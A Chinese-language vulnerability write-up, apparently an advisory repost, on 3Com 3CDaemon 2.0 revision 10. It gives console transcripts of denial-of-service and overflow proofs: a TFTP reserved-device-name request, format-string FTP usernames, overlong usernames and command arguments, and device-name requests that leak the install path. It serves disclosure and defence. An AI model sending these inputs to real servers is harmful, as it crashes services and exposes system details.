不用我说了吧，3com的这款东西还是很有名很不错滴~~~3CDaemon是一款免费的集成了TFTP、FTP和SYSLOG功能的应用程序。
作用：FTP,TFTP,SYSLOG服务器，TFTP客户端

3CDaemon存在多个安全问题，远程攻击者可以利用这些漏洞进行拒绝服务、格式串及缓冲区溢出等攻击。

1、TFTP保留设备名拒绝服务攻击：

提交类似如下的请求，可导致TFTP服务程序挂起：

D:WINDOWSsystem32>tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:Program Files3Com3CDaemon3CDaemon.exe "
"abnormal program termination".

2、FTP用户名存在格式串问题：

提交包含格式串字符作为用户名数据，可导致守护程序崩溃：

H:>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.

OR:
H:>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>

3、FTP超长用户名缓冲区溢出

由于对用户名缺少正确边界缓冲区检查，提交超长用户名可导致缓冲区溢出：

D:WINDOWSsystem32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.

4、多个FTP命令超长参数缓冲区溢出：

cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令对参数缺少充分边界检查，提交超长字符串作为命令参数可导致缓冲区溢出：

ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>

ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.

ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.

5、多个FTP命令存在格式串问题

提交格式字符串作为参数，可导致程序崩溃。

6、多个FTP命令包设备名信息泄露问题

请求保留设备名可导致返回程序安装路径信息：

ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!


受影响系统：
3Com 3CDaemon 2.0 revision 10